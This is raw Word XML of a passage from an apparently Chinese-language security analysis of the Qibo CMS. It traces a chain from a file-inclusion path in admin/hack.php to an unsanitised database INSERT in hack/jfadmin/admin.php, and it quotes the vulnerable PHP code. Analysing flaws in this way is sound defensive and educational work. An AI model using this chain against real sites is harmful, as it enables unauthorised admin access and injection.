      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="宋体" w:eastAsia="宋体" w:hint="eastAsia"/>
        </w:rPr>
        <w:t>转义</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="宋体" w:eastAsia="宋体" w:hint="eastAsia"/>
        </w:rPr>
        <w:t xml:space="preserve"> </w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="MS Mincho" w:eastAsia="MS Mincho" w:hint="eastAsia"/>
        </w:rPr>
        <w:t>截断不了</w:t>
      </w:r>
    </w:p>
    <w:p w:rsidR="00292EF3" w:rsidRDefault="00292EF3">
      <w:pPr>
        <w:pStyle w:val="a3"/>
        <w:spacing w:before="11"/>
        <w:rPr>
          <w:rFonts w:ascii="MS Mincho"/>
          <w:sz w:val="29"/>
        </w:rPr>
      </w:pPr>
    </w:p>
    <w:p w:rsidR="00292EF3" w:rsidRDefault="0080020F">
      <w:pPr>
        <w:pStyle w:val="a3"/>
        <w:spacing w:line="300" w:lineRule="auto"/>
        <w:ind w:left="417" w:right="2322"/>
        <w:rPr>
          <w:rFonts w:ascii="MS Mincho" w:eastAsia="MS Mincho" w:hint="eastAsia"/>
        </w:rPr>
      </w:pPr>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="MS Mincho" w:eastAsia="MS Mincho" w:hint="eastAsia"/>
        </w:rPr>
        <w:t>但是因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Verdana" w:eastAsia="Verdana"/>
        </w:rPr>
        <w:t xml:space="preserve">qibo </w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="MS Mincho" w:eastAsia="MS Mincho" w:hint="eastAsia"/>
        </w:rPr>
        <w:t>的特殊性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在</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="MS Mincho" w:eastAsia="MS Mincho" w:hint="eastAsia"/>
          <w:spacing w:val="-53"/>
        </w:rPr>
        <w:t xml:space="preserve"> </w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Verdana" w:eastAsia="Verdana"/>
        </w:rPr>
        <w:t xml:space="preserve">qibo </w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="MS Mincho" w:eastAsia="MS Mincho" w:hint="eastAsia"/>
        </w:rPr>
        <w:t>的后台文件当中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>function_</w:t>
      </w:r>
      <w:proofErr w:type="gramStart"/>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Verdana" w:eastAsia="Verdana"/>
        </w:rPr>
        <w:t>exists(</w:t>
      </w:r>
      <w:proofErr w:type="gramEnd"/>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Verdana" w:eastAsia="Verdana"/>
        </w:rPr>
        <w:t xml:space="preserve">'html') OR exit('ERR'); </w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="MS Mincho" w:eastAsia="MS Mincho" w:hint="eastAsia"/>
        </w:rPr>
        <w:t>所以直接</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="宋体" w:eastAsia="宋体" w:hint="eastAsia"/>
        </w:rPr>
        <w:t>访问</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="MS Mincho" w:eastAsia="MS Mincho" w:hint="eastAsia"/>
        </w:rPr>
        <w:t>是不行的。</w:t>
      </w:r>
    </w:p>
    <w:p w:rsidR="00292EF3" w:rsidRDefault="0080020F">
      <w:pPr>
        <w:pStyle w:val="a3"/>
        <w:spacing w:before="12"/>
        <w:ind w:left="417" w:right="1839"/>
        <w:rPr>
          <w:rFonts w:ascii="MS Mincho" w:eastAsia="MS Mincho" w:hint="eastAsia"/>
        </w:rPr>
      </w:pPr>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="MS Mincho" w:eastAsia="MS Mincho" w:hint="eastAsia"/>
        </w:rPr>
        <w:t>是</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="宋体" w:eastAsia="宋体" w:hint="eastAsia"/>
        </w:rPr>
        <w:t>这样</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="MS Mincho" w:eastAsia="MS Mincho" w:hint="eastAsia"/>
        </w:rPr>
        <w:t>判断的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所以我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就算不能截断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可以直接把后台的文件包含</w:t>
      </w:r>
    </w:p>
    <w:p w:rsidR="00292EF3" w:rsidRDefault="0080020F">
      <w:pPr>
        <w:pStyle w:val="a3"/>
        <w:spacing w:before="64"/>
        <w:ind w:left="417" w:right="2322"/>
        <w:rPr>
          <w:rFonts w:ascii="MS Mincho" w:eastAsia="MS Mincho" w:hint="eastAsia"/>
        </w:rPr>
      </w:pP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来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然后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而操作后台。</w:t>
      </w:r>
    </w:p>
    <w:p w:rsidR="00292EF3" w:rsidRDefault="00292EF3">
      <w:pPr>
        <w:pStyle w:val="a3"/>
        <w:spacing w:before="11"/>
        <w:rPr>
          <w:rFonts w:ascii="MS Mincho"/>
          <w:sz w:val="29"/>
        </w:rPr>
      </w:pPr>
    </w:p>
    <w:p w:rsidR="00292EF3" w:rsidRDefault="0080020F">
      <w:pPr>
        <w:pStyle w:val="a3"/>
        <w:ind w:left="417" w:right="1839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所以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>qibo</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Verdana" w:eastAsia="Verdana"/>
          <w:spacing w:val="-54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在操作包含的文件中都用正</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="宋体" w:eastAsia="宋体" w:hint="eastAsia"/>
          <w:lang w:eastAsia="zh-CN"/>
        </w:rPr>
        <w:t>则</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="MS Mincho" w:eastAsia="MS Mincho" w:hint="eastAsia"/>
          <w:lang w:eastAsia="zh-CN"/>
        </w:rPr>
        <w:t>来</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="宋体" w:eastAsia="宋体" w:hint="eastAsia"/>
          <w:lang w:eastAsia="zh-CN"/>
        </w:rPr>
        <w:t>过滤</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="MS Mincho" w:eastAsia="MS Mincho" w:hint="eastAsia"/>
          <w:lang w:eastAsia="zh-CN"/>
        </w:rPr>
        <w:t>了</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Verdana" w:eastAsia="Verdana"/>
          <w:lang w:eastAsia="zh-CN"/>
        </w:rPr>
        <w:t xml:space="preserve">, </w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="MS Mincho" w:eastAsia="MS Mincho" w:hint="eastAsia"/>
          <w:lang w:eastAsia="zh-CN"/>
        </w:rPr>
        <w:t>却</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="宋体" w:eastAsia="宋体" w:hint="eastAsia"/>
          <w:lang w:eastAsia="zh-CN"/>
        </w:rPr>
        <w:t>遗</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="MS Mincho" w:eastAsia="MS Mincho" w:hint="eastAsia"/>
          <w:lang w:eastAsia="zh-CN"/>
        </w:rPr>
        <w:t>漏了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里。</w:t>
      </w:r>
    </w:p>
    <w:p w:rsidR="00292EF3" w:rsidRDefault="00292EF3">
      <w:pPr>
        <w:rPr>
          <w:rFonts w:ascii="MS Mincho" w:eastAsia="MS Mincho" w:hint="eastAsia"/>
          <w:lang w:eastAsia="zh-CN"/>
        </w:rPr>
        <w:sectPr w:rsidR="00292EF3">
          <w:footerReference w:type="default" r:id="rId102"/>
          <w:pgSz w:w="9980" w:h="14190"/>
          <w:pgMar w:top="1340" w:right="0" w:bottom="1160" w:left="1380" w:header="0" w:footer="978" w:gutter="0"/>
          <w:pgNumType w:start="180"/>
          <w:cols w:space="720"/>
        </w:sectPr>
      </w:pPr>
    </w:p>
    <w:p w:rsidR="00292EF3" w:rsidRDefault="0080020F">
      <w:pPr>
        <w:pStyle w:val="a3"/>
        <w:spacing w:before="99"/>
        <w:ind w:left="417" w:right="317"/>
        <w:rPr>
          <w:rFonts w:ascii="宋体" w:eastAsia="宋体" w:hint="eastAsia"/>
        </w:rPr>
      </w:pPr>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="MS Mincho" w:eastAsia="MS Mincho" w:hint="eastAsia"/>
        </w:rPr>
        <w:lastRenderedPageBreak/>
        <w:t>但是打开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 xml:space="preserve">do/js.php </w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="宋体" w:eastAsia="宋体" w:hint="eastAsia"/>
        </w:rPr>
        <w:t>发现</w:t>
      </w:r>
    </w:p>
    <w:p w:rsidR="00292EF3" w:rsidRDefault="0080020F">
      <w:pPr>
        <w:pStyle w:val="a3"/>
        <w:spacing w:before="9"/>
        <w:rPr>
          <w:rFonts w:ascii="宋体"/>
          <w:sz w:val="25"/>
        </w:rPr>
      </w:pPr>
      <w:r>
        <w:pict>
          <v:shape id="_x0000_s1740" type="#_x0000_t202" style="position:absolute;margin-left:80.7pt;margin-top:18.95pt;width:337.5pt;height:116.05pt;z-index:846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6"/>
                    <w:rPr>
                      <w:rFonts w:ascii="宋体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4260"/>
                  </w:pPr>
                  <w:proofErr w:type="gramStart"/>
                  <w:r>
                    <w:rPr>
                      <w:color w:val="333333"/>
                    </w:rPr>
                    <w:t>&lt;?php</w:t>
                  </w:r>
                  <w:proofErr w:type="gramEnd"/>
                  <w:r>
                    <w:rPr>
                      <w:color w:val="333333"/>
                    </w:rPr>
                    <w:t xml:space="preserve"> error_reporting(0);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660"/>
                  </w:pPr>
                  <w:proofErr w:type="gramStart"/>
                  <w:r>
                    <w:rPr>
                      <w:color w:val="333333"/>
                    </w:rPr>
                    <w:t>require(</w:t>
                  </w:r>
                  <w:proofErr w:type="gramEnd"/>
                  <w:r>
                    <w:rPr>
                      <w:color w:val="333333"/>
                    </w:rPr>
                    <w:t xml:space="preserve">dirname( FILE )."/../data/config.php"); </w:t>
                  </w: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!eregi("^([0-9]+)$",$_GET['id'])){</w:t>
                  </w:r>
                </w:p>
                <w:p w:rsidR="00292EF3" w:rsidRDefault="0080020F">
                  <w:pPr>
                    <w:pStyle w:val="a3"/>
                    <w:spacing w:line="215" w:lineRule="exact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die(</w:t>
                  </w:r>
                  <w:proofErr w:type="gramEnd"/>
                  <w:r>
                    <w:rPr>
                      <w:color w:val="333333"/>
                    </w:rPr>
                    <w:t>"document.write('ID</w:t>
                  </w:r>
                  <w:r>
                    <w:rPr>
                      <w:color w:val="333333"/>
                      <w:spacing w:val="-82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不存在</w:t>
                  </w:r>
                  <w:r>
                    <w:rPr>
                      <w:color w:val="333333"/>
                    </w:rPr>
                    <w:t>');");</w:t>
                  </w:r>
                </w:p>
                <w:p w:rsidR="00292EF3" w:rsidRDefault="0080020F">
                  <w:pPr>
                    <w:pStyle w:val="a3"/>
                    <w:spacing w:before="112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92EF3" w:rsidRDefault="00292EF3">
      <w:pPr>
        <w:pStyle w:val="a3"/>
        <w:spacing w:before="11"/>
        <w:rPr>
          <w:rFonts w:ascii="宋体"/>
          <w:sz w:val="19"/>
        </w:rPr>
      </w:pPr>
    </w:p>
    <w:p w:rsidR="00292EF3" w:rsidRDefault="0080020F">
      <w:pPr>
        <w:pStyle w:val="a3"/>
        <w:spacing w:before="38" w:line="568" w:lineRule="auto"/>
        <w:ind w:left="417" w:right="3004"/>
        <w:rPr>
          <w:rFonts w:ascii="MS Mincho" w:eastAsia="MS Mincho" w:hint="eastAsia"/>
        </w:rPr>
      </w:pPr>
      <w:r>
        <w:rPr>
          <w:rFonts w:hint="eastAsia"/>
        </w:rPr>
        <w:pict>
          <v:shape id="_x0000_s1739" type="#_x0000_t202" style="position:absolute;left:0;text-align:left;margin-left:80.7pt;margin-top:50.85pt;width:337.5pt;height:197.55pt;z-index:-36244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$hack&amp;&amp;ereg("^([a-z_0-9]+)$",$hack))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is_file(ROOT_PATH."hack/$hack/admin.php"))</w:t>
                  </w:r>
                </w:p>
                <w:p w:rsidR="00292EF3" w:rsidRDefault="0080020F">
                  <w:pPr>
                    <w:pStyle w:val="a3"/>
                    <w:spacing w:before="124"/>
                    <w:ind w:left="180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include(</w:t>
                  </w:r>
                  <w:proofErr w:type="gramEnd"/>
                  <w:r>
                    <w:rPr>
                      <w:color w:val="333333"/>
                    </w:rPr>
                    <w:t>ROOT_PATH."hack/$hack/admin.php");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}else</w:t>
                  </w:r>
                  <w:proofErr w:type="gramEnd"/>
                  <w:r>
                    <w:rPr>
                      <w:color w:val="333333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65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showmsg(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文件不存在</w:t>
                  </w:r>
                  <w:r>
                    <w:rPr>
                      <w:color w:val="333333"/>
                    </w:rPr>
                    <w:t>");</w:t>
                  </w:r>
                </w:p>
                <w:p w:rsidR="00292EF3" w:rsidRDefault="0080020F">
                  <w:pPr>
                    <w:pStyle w:val="a3"/>
                    <w:spacing w:before="112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MS Mincho" w:eastAsia="MS Mincho" w:hint="eastAsia"/>
        </w:rPr>
        <w:t>已</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="宋体" w:eastAsia="宋体" w:hint="eastAsia"/>
        </w:rPr>
        <w:t>经</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="MS Mincho" w:eastAsia="MS Mincho" w:hint="eastAsia"/>
        </w:rPr>
        <w:t>把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 xml:space="preserve">extract </w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="MS Mincho" w:eastAsia="MS Mincho" w:hint="eastAsia"/>
        </w:rPr>
        <w:t>去掉了</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Verdana" w:eastAsia="Verdana"/>
        </w:rPr>
        <w:t xml:space="preserve">, </w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="MS Mincho" w:eastAsia="MS Mincho" w:hint="eastAsia"/>
        </w:rPr>
        <w:t>那就找另外的。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在</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="MS Mincho" w:eastAsia="MS Mincho" w:hint="eastAsia"/>
          <w:spacing w:val="-83"/>
        </w:rPr>
        <w:t xml:space="preserve"> </w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Verdana" w:eastAsia="Verdana"/>
        </w:rPr>
        <w:t xml:space="preserve">admin/hack.php </w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="MS Mincho" w:eastAsia="MS Mincho" w:hint="eastAsia"/>
        </w:rPr>
        <w:t>中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10"/>
        <w:rPr>
          <w:rFonts w:ascii="MS Mincho"/>
          <w:sz w:val="17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</w:rPr>
      </w:pPr>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="MS Mincho" w:eastAsia="MS Mincho" w:hint="eastAsia"/>
        </w:rPr>
        <w:t>再包含文件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再</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="宋体" w:eastAsia="宋体" w:hint="eastAsia"/>
        </w:rPr>
        <w:t>继续</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="MS Mincho" w:eastAsia="MS Mincho" w:hint="eastAsia"/>
        </w:rPr>
        <w:t>跟。</w:t>
      </w:r>
    </w:p>
    <w:p w:rsidR="00292EF3" w:rsidRDefault="00292EF3">
      <w:pPr>
        <w:pStyle w:val="a3"/>
        <w:spacing w:before="11"/>
        <w:rPr>
          <w:rFonts w:ascii="MS Mincho"/>
          <w:sz w:val="29"/>
        </w:rPr>
      </w:pPr>
    </w:p>
    <w:p w:rsidR="00292EF3" w:rsidRDefault="0080020F">
      <w:pPr>
        <w:pStyle w:val="a3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group id="_x0000_s1691" style="position:absolute;left:0;text-align:left;margin-left:80.6pt;margin-top:16.2pt;width:337.75pt;height:113.5pt;z-index:8512;mso-wrap-distance-left:0;mso-wrap-distance-right:0;mso-position-horizontal-relative:page" coordorigin="1612,324" coordsize="6755,2270">
            <v:rect id="_x0000_s1738" style="position:absolute;left:1617;top:329;width:6745;height:506" fillcolor="#f8f8f8" stroked="f"/>
            <v:rect id="_x0000_s1737" style="position:absolute;left:1797;top:572;width:5543;height:200" fillcolor="#f8f8f8" stroked="f"/>
            <v:rect id="_x0000_s1736" style="position:absolute;left:1617;top:835;width:6745;height:326" fillcolor="#f8f8f8" stroked="f"/>
            <v:rect id="_x0000_s1735" style="position:absolute;left:1797;top:898;width:120;height:200" fillcolor="#f8f8f8" stroked="f"/>
            <v:rect id="_x0000_s1734" style="position:absolute;left:1917;top:898;width:100;height:200" fillcolor="#f8f8f8" stroked="f"/>
            <v:rect id="_x0000_s1733" style="position:absolute;left:1617;top:1161;width:6745;height:326" fillcolor="#f8f8f8" stroked="f"/>
            <v:shape id="_x0000_s1732" type="#_x0000_t75" style="position:absolute;left:1797;top:1224;width:400;height:200">
              <v:imagedata r:id="rId36" o:title=""/>
            </v:shape>
            <v:rect id="_x0000_s1731" style="position:absolute;left:1617;top:1487;width:6745;height:326" fillcolor="#f8f8f8" stroked="f"/>
            <v:rect id="_x0000_s1730" style="position:absolute;left:1797;top:1550;width:916;height:200" fillcolor="#f8f8f8" stroked="f"/>
            <v:rect id="_x0000_s1729" style="position:absolute;left:2713;top:1550;width:2169;height:200" fillcolor="#f8f8f8" stroked="f"/>
            <v:rect id="_x0000_s1728" style="position:absolute;left:4882;top:1550;width:120;height:200" fillcolor="#f8f8f8" stroked="f"/>
            <v:rect id="_x0000_s1727" style="position:absolute;left:5002;top:1550;width:482;height:200" fillcolor="#f8f8f8" stroked="f"/>
            <v:rect id="_x0000_s1726" style="position:absolute;left:5484;top:1550;width:121;height:200" fillcolor="#f8f8f8" stroked="f"/>
            <v:rect id="_x0000_s1725" style="position:absolute;left:5605;top:1550;width:1807;height:200" fillcolor="#f8f8f8" stroked="f"/>
            <v:rect id="_x0000_s1724" style="position:absolute;left:7412;top:1550;width:121;height:200" fillcolor="#f8f8f8" stroked="f"/>
            <v:rect id="_x0000_s1723" style="position:absolute;left:1617;top:1813;width:6745;height:326" fillcolor="#f8f8f8" stroked="f"/>
            <v:rect id="_x0000_s1722" style="position:absolute;left:1797;top:1876;width:120;height:200" fillcolor="#f8f8f8" stroked="f"/>
            <v:line id="_x0000_s1721" style="position:absolute" from="1959,1876" to="1959,2076" strokecolor="#f8f8f8" strokeweight="4.2pt"/>
            <v:rect id="_x0000_s1720" style="position:absolute;left:2001;top:1876;width:603;height:200" fillcolor="#f8f8f8" stroked="f"/>
            <v:line id="_x0000_s1719" style="position:absolute" from="2646,1876" to="2646,2076" strokecolor="#f8f8f8" strokeweight="4.2pt"/>
            <v:rect id="_x0000_s1718" style="position:absolute;left:2688;top:1876;width:120;height:200" fillcolor="#f8f8f8" stroked="f"/>
            <v:line id="_x0000_s1717" style="position:absolute" from="2850,1876" to="2850,2076" strokecolor="#f8f8f8" strokeweight="4.25pt"/>
            <v:rect id="_x0000_s1716" style="position:absolute;left:2893;top:1876;width:843;height:200" fillcolor="#f8f8f8" stroked="f"/>
            <v:line id="_x0000_s1715" style="position:absolute" from="3778,1876" to="3778,2076" strokecolor="#f8f8f8" strokeweight="4.2pt"/>
            <v:rect id="_x0000_s1714" style="position:absolute;left:3820;top:1876;width:121;height:200" fillcolor="#f8f8f8" stroked="f"/>
            <v:line id="_x0000_s1713" style="position:absolute" from="3983,1876" to="3983,2076" strokecolor="#f8f8f8" strokeweight="4.2pt"/>
            <v:rect id="_x0000_s1712" style="position:absolute;left:4025;top:1876;width:1205;height:200" fillcolor="#f8f8f8" stroked="f"/>
            <v:line id="_x0000_s1711" style="position:absolute" from="5272,1876" to="5272,2076" strokecolor="#f8f8f8" strokeweight="4.2pt"/>
            <v:rect id="_x0000_s1710" style="position:absolute;left:5314;top:1876;width:723;height:200" fillcolor="#f8f8f8" stroked="f"/>
            <v:line id="_x0000_s1709" style="position:absolute" from="6079,1876" to="6079,2076" strokecolor="#f8f8f8" strokeweight="4.2pt"/>
            <v:rect id="_x0000_s1708" style="position:absolute;left:6121;top:1876;width:121;height:200" fillcolor="#f8f8f8" stroked="f"/>
            <v:line id="_x0000_s1707" style="position:absolute" from="6284,1876" to="6284,2076" strokecolor="#f8f8f8" strokeweight="4.2pt"/>
            <v:rect id="_x0000_s1706" style="position:absolute;left:6326;top:1876;width:723;height:200" fillcolor="#f8f8f8" stroked="f"/>
            <v:line id="_x0000_s1705" style="position:absolute" from="7091,1876" to="7091,2076" strokecolor="#f8f8f8" strokeweight="4.2pt"/>
            <v:rect id="_x0000_s1704" style="position:absolute;left:7133;top:1876;width:121;height:200" fillcolor="#f8f8f8" stroked="f"/>
            <v:line id="_x0000_s1703" style="position:absolute" from="7296,1876" to="7296,2076" strokecolor="#f8f8f8" strokeweight="4.2pt"/>
            <v:rect id="_x0000_s1702" style="position:absolute;left:7338;top:1876;width:844;height:200" fillcolor="#f8f8f8" stroked="f"/>
            <v:rect id="_x0000_s1701" style="position:absolute;left:8182;top:1876;width:120;height:200" fillcolor="#f8f8f8" stroked="f"/>
            <v:rect id="_x0000_s1700" style="position:absolute;left:1617;top:2139;width:6745;height:450" fillcolor="#f8f8f8" stroked="f"/>
            <v:rect id="_x0000_s1699" style="position:absolute;left:1797;top:2202;width:1084;height:200" fillcolor="#f8f8f8" stroked="f"/>
            <v:rect id="_x0000_s1698" style="position:absolute;left:2881;top:2202;width:121;height:200" fillcolor="#f8f8f8" stroked="f"/>
            <v:rect id="_x0000_s1697" style="position:absolute;left:3002;top:2202;width:1325;height:200" fillcolor="#f8f8f8" stroked="f"/>
            <v:rect id="_x0000_s1696" style="position:absolute;left:4327;top:2202;width:121;height:200" fillcolor="#f8f8f8" stroked="f"/>
            <v:rect id="_x0000_s1695" style="position:absolute;left:4448;top:2202;width:843;height:200" fillcolor="#f8f8f8" stroked="f"/>
            <v:rect id="_x0000_s1694" style="position:absolute;left:5291;top:2202;width:121;height:200" fillcolor="#f8f8f8" stroked="f"/>
            <v:rect id="_x0000_s1693" style="position:absolute;left:5412;top:2202;width:482;height:200" fillcolor="#f8f8f8" stroked="f"/>
            <v:shape id="_x0000_s1692" type="#_x0000_t202" style="position:absolute;left:1614;top:326;width:6750;height:2265" filled="f" strokecolor="#ccc" strokeweight=".24pt">
              <v:textbox inset="0,0,0,0">
                <w:txbxContent>
                  <w:p w:rsidR="00292EF3" w:rsidRDefault="00292EF3">
                    <w:pPr>
                      <w:spacing w:before="8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elseif(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$action=="addjf"&amp;&amp;$Apower[jfadmin_mod])</w:t>
                    </w:r>
                  </w:p>
                  <w:p w:rsidR="00292EF3" w:rsidRDefault="0080020F">
                    <w:pPr>
                      <w:spacing w:before="126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292EF3">
                    <w:pPr>
                      <w:rPr>
                        <w:rFonts w:ascii="MS Mincho"/>
                        <w:sz w:val="20"/>
                      </w:rPr>
                    </w:pPr>
                  </w:p>
                  <w:p w:rsidR="00292EF3" w:rsidRDefault="00292EF3">
                    <w:pPr>
                      <w:spacing w:before="5"/>
                      <w:rPr>
                        <w:rFonts w:ascii="MS Mincho"/>
                        <w:sz w:val="14"/>
                      </w:rPr>
                    </w:pPr>
                  </w:p>
                  <w:p w:rsidR="00292EF3" w:rsidRDefault="0080020F">
                    <w:pPr>
                      <w:ind w:left="1095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$db-&gt;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query(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"INSERT INTO `{$pre}jfabout`</w:t>
                    </w:r>
                  </w:p>
                  <w:p w:rsidR="00292EF3" w:rsidRDefault="0080020F">
                    <w:pPr>
                      <w:spacing w:before="126" w:line="391" w:lineRule="auto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`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fid`</w:t>
                    </w:r>
                    <w:r>
                      <w:rPr>
                        <w:color w:val="333333"/>
                        <w:spacing w:val="-3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`title`</w:t>
                    </w:r>
                    <w:r>
                      <w:rPr>
                        <w:color w:val="333333"/>
                        <w:spacing w:val="-3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,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`content`,</w:t>
                    </w:r>
                    <w:r>
                      <w:rPr>
                        <w:color w:val="333333"/>
                        <w:spacing w:val="-3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`list`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)</w:t>
                    </w:r>
                    <w:r>
                      <w:rPr>
                        <w:color w:val="333333"/>
                        <w:spacing w:val="-37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VALUES</w:t>
                    </w:r>
                    <w:r>
                      <w:rPr>
                        <w:color w:val="333333"/>
                        <w:spacing w:val="-37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(</w:t>
                    </w:r>
                    <w:r>
                      <w:rPr>
                        <w:color w:val="333333"/>
                        <w:spacing w:val="-40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'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$fid', '$title', '$content', '$list'</w:t>
                    </w:r>
                    <w:r>
                      <w:rPr>
                        <w:color w:val="333333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)");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MS Mincho" w:eastAsia="MS Mincho" w:hint="eastAsia"/>
        </w:rPr>
        <w:t>在</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="MS Mincho" w:eastAsia="MS Mincho" w:hint="eastAsia"/>
          <w:spacing w:val="-86"/>
        </w:rPr>
        <w:t xml:space="preserve"> </w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Verdana" w:eastAsia="Verdana"/>
        </w:rPr>
        <w:t xml:space="preserve">hack/jfadmin/admin.php </w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="MS Mincho" w:eastAsia="MS Mincho" w:hint="eastAsia"/>
        </w:rPr>
        <w:t>中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1690" type="#_x0000_t202" style="width:337.5pt;height:67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0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spacing w:line="338" w:lineRule="auto"/>
                    <w:ind w:left="180" w:right="50" w:firstLine="914"/>
                  </w:pPr>
                  <w:proofErr w:type="gramStart"/>
                  <w:r>
                    <w:rPr>
                      <w:color w:val="333333"/>
                    </w:rPr>
                    <w:t>jump(</w:t>
                  </w:r>
                  <w:proofErr w:type="gramEnd"/>
                  <w:r>
                    <w:rPr>
                      <w:color w:val="333333"/>
                    </w:rPr>
                    <w:t>"</w:t>
                  </w:r>
                  <w:r>
                    <w:rPr>
                      <w:rFonts w:ascii="宋体" w:eastAsia="宋体" w:hint="eastAsia"/>
                      <w:color w:val="333333"/>
                    </w:rPr>
                    <w:t>添加成功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color w:val="333333"/>
                      <w:w w:val="95"/>
                    </w:rPr>
                    <w:t>","</w:t>
                  </w:r>
                  <w:r>
                    <w:rPr>
                      <w:color w:val="333333"/>
                      <w:w w:val="95"/>
                    </w:rPr>
                    <w:t>index.php?lfj=jfadmin&amp;job=listjf&amp;fid=$fid",1);</w:t>
                  </w:r>
                </w:p>
                <w:p w:rsidR="00292EF3" w:rsidRDefault="0080020F">
                  <w:pPr>
                    <w:pStyle w:val="a3"/>
                    <w:spacing w:before="42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a3"/>
        <w:spacing w:line="232" w:lineRule="exact"/>
        <w:ind w:left="417" w:right="317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这里入库了。</w:t>
      </w:r>
    </w:p>
    <w:p w:rsidR="00292EF3" w:rsidRDefault="0080020F">
      <w:pPr>
        <w:pStyle w:val="a3"/>
        <w:spacing w:before="64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再看到</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="MS Mincho" w:eastAsia="MS Mincho" w:hint="eastAsia"/>
          <w:spacing w:val="-81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do/jf.php </w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="MS Mincho" w:eastAsia="MS Mincho" w:hint="eastAsia"/>
          <w:lang w:eastAsia="zh-CN"/>
        </w:rPr>
        <w:t>中</w:t>
      </w:r>
    </w:p>
    <w:p w:rsidR="00292EF3" w:rsidRDefault="0080020F">
      <w:pPr>
        <w:pStyle w:val="a3"/>
        <w:spacing w:before="8"/>
        <w:rPr>
          <w:rFonts w:ascii="MS Mincho"/>
          <w:sz w:val="25"/>
          <w:lang w:eastAsia="zh-CN"/>
        </w:rPr>
      </w:pPr>
      <w:r>
        <w:pict>
          <v:shape id="_x0000_s1689" type="#_x0000_t202" style="position:absolute;margin-left:80.7pt;margin-top:18.9pt;width:337.5pt;height:295.35pt;z-index:8584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r>
                    <w:rPr>
                      <w:color w:val="333333"/>
                    </w:rPr>
                    <w:t>$lfjdb &amp;&amp; $</w:t>
                  </w:r>
                  <w:proofErr w:type="gramStart"/>
                  <w:r>
                    <w:rPr>
                      <w:color w:val="333333"/>
                    </w:rPr>
                    <w:t>lfjdb[</w:t>
                  </w:r>
                  <w:proofErr w:type="gramEnd"/>
                  <w:r>
                    <w:rPr>
                      <w:color w:val="333333"/>
                    </w:rPr>
                    <w:t>money]=get_money($lfjdb[uid]);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163"/>
                  </w:pPr>
                  <w:r>
                    <w:rPr>
                      <w:color w:val="333333"/>
                    </w:rPr>
                    <w:t>$query = $db-&gt;</w:t>
                  </w:r>
                  <w:proofErr w:type="gramStart"/>
                  <w:r>
                    <w:rPr>
                      <w:color w:val="333333"/>
                    </w:rPr>
                    <w:t>query(</w:t>
                  </w:r>
                  <w:proofErr w:type="gramEnd"/>
                  <w:r>
                    <w:rPr>
                      <w:color w:val="333333"/>
                    </w:rPr>
                    <w:t>"SELECT * FROM {$pre}jfsort ORDER BY list");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>$rs = $db-&gt;fetch_array($query)){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fnameDB[</w:t>
                  </w:r>
                  <w:proofErr w:type="gramEnd"/>
                  <w:r>
                    <w:rPr>
                      <w:color w:val="333333"/>
                    </w:rPr>
                    <w:t>$rs[fid]]=$rs[name];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r>
                    <w:rPr>
                      <w:color w:val="333333"/>
                    </w:rPr>
                    <w:t>$query2 = $</w:t>
                  </w:r>
                  <w:r>
                    <w:rPr>
                      <w:color w:val="333333"/>
                    </w:rPr>
                    <w:t>db-&gt;</w:t>
                  </w:r>
                  <w:proofErr w:type="gramStart"/>
                  <w:r>
                    <w:rPr>
                      <w:color w:val="333333"/>
                    </w:rPr>
                    <w:t>query(</w:t>
                  </w:r>
                  <w:proofErr w:type="gramEnd"/>
                  <w:r>
                    <w:rPr>
                      <w:color w:val="333333"/>
                    </w:rPr>
